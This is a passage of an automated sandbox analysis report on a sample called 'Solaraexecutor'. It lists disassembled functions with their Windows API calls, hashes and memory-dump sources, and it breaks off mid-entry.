Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 9b5918c7ff1f3c4adde4ecdee9fb3fc43f9cd4b2f3b296a56ec8de5ed9222ae9
Instruction ID: 8ad04b142a010b9d8ce1203c146f25edeff908daf99d48aefc450d1b93aeb66f
Opcode Fuzzy Hash: 9b5918c7ff1f3c4adde4ecdee9fb3fc43f9cd4b2f3b296a56ec8de5ed9222ae9
Instruction Fuzzy Hash: 7441A9719456689ADB20EB60DC55BE9B368EF20308F0844EAE08A97082EB755FC5DB70

Function 00D213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D213E1

Part of subcall function 00D25E37: __EH_prolog.LIBCMT ref: 00D25E3C

Part of subcall function 00D2CE40: __EH_prolog.LIBCMT ref: 00D2CE45

Part of subcall function 00D2B505: __EH_prolog.LIBCMT ref: 00D2B50A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e94c85bd1d92546079a987d21ec4926ba8887a576a8a49a3aba47c0f23257490
Instruction ID: 70822d5eb4c41975cf313715bcca3b6d31743092913bac8718d5bea3eaf6d9de
Opcode Fuzzy Hash: e94c85bd1d92546079a987d21ec4926ba8887a576a8a49a3aba47c0f23257490
Instruction Fuzzy Hash: 8C4130B0905B409EE724DF798885AE6FBE5FF29314F50492ED5FE83282C7716654CB20

Function 00D213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D213E1

Part of subcall function 00D25E37: __EH_prolog.LIBCMT ref: 00D25E3C

Part of subcall function 00D2CE40: __EH_prolog.LIBCMT ref: 00D2CE45

Part of subcall function 00D2B505: __EH_prolog.LIBCMT ref: 00D2B50A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 861709cf8a33bca40a6c211543edd2cc3590b14a8e7dd2017898154ca3941d39
Instruction ID: 1248567d8531ab413e131ed08e7fa5c9161cfc41d64551c074a2a427cd1f8908
Opcode Fuzzy Hash: 861709cf8a33bca40a6c211543edd2cc3590b14a8e7dd2017898154ca3941d39
Instruction Fuzzy Hash: 57413DB0905B409EE724DF798885AE6FBE5FF29314F504A2ED5FE83282C7716654CB20

Function 00D3B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D3B098

Part of subcall function 00D213DC: __EH_prolog.LIBCMT ref: 00D213E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: feff71b556bd4259cd5d1be698ffea5c2242dd073fa0606480434913cdb5bf26
Instruction ID: 36dc5cb680ceff9a608ab9d3509599170a739dd0ac3e67d2efff5ecb703a3b7e
Opcode Fuzzy Hash: feff71b556bd4259cd5d1be698ffea5c2242dd073fa0606480434913cdb5bf26
Instruction Fuzzy Hash: 53318B758042599FCF15DF68D851AEEBBB4EF19304F1444AEE809B3282D735AE04CB71

Function 00D4AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00D4ACF8

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 08ce03306a651a3e16378ad809f6c3547fc2d8ee82f0be43abb44c27338ded66
Instruction ID: 4f5174dacb97551219569cee61be21dcb3e1ce71e5b76fdbc344be01d2642186
Opcode Fuzzy Hash: 08ce03306a651a3e16378ad809f6c3547fc2d8ee82f0be43abb44c27338ded66
Instruction Fuzzy Hash: EE11C637A407259F9B269F2DEC8099A7395EB8436171E4220FD55EB394E730DD0187F2

Function 00D29215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D2921A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ed721474ac8aa5e57feac8383d174234495fb5b350e8dfe10565829d131888c9
Instruction ID: 83badebf4532d267fe9bd2c01ac06bf4b2b0289e0ee5c0eca86342d961db4480
Opcode Fuzzy Hash: ed721474ac8aa5e57feac8383d174234495fb5b350e8dfe10565829d131888c9
Instruction Fuzzy Hash: FD018633900534EBCF16ABA8DC519DEB732FFA8758F054125E815B7151DA34CD0486B0

Function 00D43C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00D43C3F

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 48c0ac721584198e47b6cb82780c2cc1409fe2c0045df77174090b1a735ec4b8
Instruction ID: 21e622057c9da97992f3608136ebd951f7b86e8df964b6909f8e20b4a8ca4e57
Opcode Fuzzy Hash: 48c0ac721584198e47b6cb82780c2cc1409fe2c0045df77174090b1a735ec4b8
Instruction Fuzzy Hash: 19F0E5362003269FCF118EACEC40A9A77A9EF01B617184124FE15E71D0DB31EA20C7F0

Function 00D48E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 713c8d6ab7d05ff8547d74d48eac37d1ab23224f76bebd700fbb29eb21264d2e
Instruction ID: 554939ba4e6137128822efd90df006404193cff9d03d306fb5aedbdccf40a582
Opcode Fuzzy Hash: 713c8d6ab7d05ff8547d74d48eac37d1ab23224f76bebd700fbb29eb21264d2e
Instruction Fuzzy Hash: ECE06D3120622557EA7126669C05B9FB648DF41BF8F190131BC59A6191DF22CC00A2F1

Function 00D25ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D25AC2

Part of subcall function 00D2B505: __EH_prolog.LIBCMT ref: 00D2B50A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b415e8f8bdc562cc2a7ba34c58046af221215fa5425843f0cfc965a5761f0327
Instruction ID: ec8a1a0a162f9a6712d5410856341f3aa721bd7c4f77743bff613e9626b0bcec
Opcode Fuzzy Hash: b415e8f8bdc562cc2a7ba34c58046af221215fa5425843f0cfc965a5761f0327
Instruction Fuzzy Hash: 3E013130511694DBD715E7B8D0567DEFBA8DF64304F54448DA45653282CBB41B08DBB2

Function 00D2A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00D2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6C4
Part of subcall function 00D2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6F2
Part of subcall function 00D2A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2A598

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: be4d994f40579d93f1f2dc28cb15cb1464445eb2720f775b3fc4e1ebd234e017
Instruction ID: 7609f543b46382982da34d3fdc156bbb107c855addd73b5d055cab98f4066866
Opcode Fuzzy Hash: be4d994f40579d93f1f2dc28cb15cb1464445eb2720f775b3fc4e1ebd234e017
Instruction Fuzzy Hash: 8DF089310087A0ABCB2257BC59057CB7B91DF35335F058A49F5FD52196C37550949B33

Function 00D30E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00D30E3D

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 029a69479b0a7b33d084c637c8662a957dc4579964b92cab8de8e241abb9b6c6
Instruction ID: 92916b549c2450f7df3f52cbb0005f5aa21b4a5d025735f3733be3b0b05ccee7
Opcode Fuzzy Hash: 029a69479b0a7b33d084c637c8662a957dc4579964b92cab8de8e241abb9b6c6
Instruction Fuzzy Hash: A4D02B1570136516DF11332838257FE2D0ACFE7351F0C0065F045A73C3CE444886B271

Function 00D3A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00D3A62C

Part of subcall function 00D3A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D3A3DA

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: bd969f6272fe295b5e7c860f2a7db858deda408cf34a19ea832554a23fc2318a
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 5ED0C97131460ABADF426B698C13A6EBA99EB01340F048136B8C2D5191EAB1DD10A672

Function 00D3E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00D3E5E3

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 18c42d85f9113f95ccf5fbc642aeb68c7a658a26f36b077a3c243dadaa3d08fa
Instruction ID: 3c44c493569bbdfc42e38c22471c739d749d98f07520ac43ee5e66462d8d73ac
Opcode Fuzzy Hash: 18c42d85f9113f95ccf5fbc642aeb68c7a658a26f36b077a3c243dadaa3d08fa
Instruction Fuzzy Hash: 1AD0C9B85903809BD602EBA9E8467947358B364705FD80501B145D16D5DB6484CA8735

Function 00D3DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D31B3E), ref: 00D3DD92

Part of subcall function 00D3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
Part of subcall function 00D3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
Part of subcall function 00D3B568: IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
Part of subcall function 00D3B568: TranslateMessage.USER32(?), ref: 00D3B5AC
Part of subcall function 00D3B568: DispatchMessageW.USER32(?), ref: 00D3B5B6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 70890bae784fb6297c632ed22e4997d38101b33a7db335a95d803b0bdb8ba5e8
Instruction ID: 4e969d8161208f1d7280f72c34895e88a40c81410694678e45b627fe82bd1c4a
Opcode Fuzzy Hash: 70890bae784fb6297c632ed22e4997d38101b33a7db335a95d803b0bdb8ba5e8
Instruction Fuzzy Hash: 78D09E31154300BAD6012B51CD06F0B7AA2EB88F04F004555B384740B1CAB2AD31EB36

Function 00D298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00D297BE), ref: 00D298C8

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: d710f539f2bd08b9f1fdc3c9147e09c499e24505c7b9d198b14876d8efa01802
Instruction ID: 9cb7aa54d810dfe661808575ec0f57536f8f22208eb1034de523ed797aa77c1f
Opcode Fuzzy Hash: d710f539f2bd08b9f1fdc3c9147e09c499e24505c7b9d198b14876d8efa01802
Instruction Fuzzy Hash: EDC01234400315858E344A34A854095F311AA637BABBC8795C028C50E1C323CC47EA31

Function 00D3E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e4c7d828bd0d7e06d3d84675787a07dd5f99db7ab7fd0f532714c2b11957c672
Instruction ID: d48c89d16534a9ad5fb6cac5833d50abf44f17ab3a02e797a80436347a752319
Opcode Fuzzy Hash: e4c7d828bd0d7e06d3d84675787a07dd5f99db7ab7fd0f532714c2b11957c672
Instruction Fuzzy Hash: B3B012D5669300FC310461851C06C37030CC0C1F11730843EFC05C04C0F840EC080471

Function 00D3E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dc7114b8970e89d894826782d8cb00f09739ebd4747e52db52cc9d02f8095757
Instruction ID: 4acc2cf80fa8ab9c662296692c70625ae68220084fc04960030a7a4ff84f8b4a
Opcode Fuzzy Hash: dc7114b8970e89d894826782d8cb00f09739ebd4747e52db52cc9d02f8095757
Instruction Fuzzy Hash: FCB012D1669300EC3104A2451C06C3B030CC0C1F11730C03EFC0DC02C0E840EC0C0571

Function 00D3E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ebd94c4f49800136ceaebbeb6f5b357341b2efd7370423fb855dc9ca74ab15cb
Instruction ID: 0fe5508bb11ad3491acffc9161353c36781e5c5b08ddbeb500ddbe9648e1ae37
Opcode Fuzzy Hash: ebd94c4f49800136ceaebbeb6f5b357341b2efd7370423fb855dc9ca74ab15cb
Instruction Fuzzy Hash: C9B012D566D300EC3104A1891C06C37030CC0C0F11730403EFC09C01C0F840AC080671

Function 00D3E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D3E1E3

Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
